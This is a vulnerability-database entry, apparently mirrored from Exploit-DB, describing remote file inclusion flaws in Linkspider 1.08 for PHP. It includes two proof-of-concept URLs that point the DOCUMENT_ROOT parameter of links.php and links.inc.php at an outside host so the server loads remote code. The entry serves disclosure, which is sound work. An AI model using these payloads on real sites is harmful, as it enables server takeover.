Linkspider 1.08 - Multiple Remote File Inclusions

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056778 漏洞类型
发布时间 2008-08-08 更新时间 2008-08-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/32217
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/30632/info

Linkspider is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Linkspider 1.08 is vulnerable; other versions may be affected as well. 

http://www.example.com/links.php?_SERVER[DOCUMENT_ROOT]=http://www.example2.com
http://www.example.com/links.inc.php?_SERVER[DOCUMENT_ROOT]=http://www.example2.com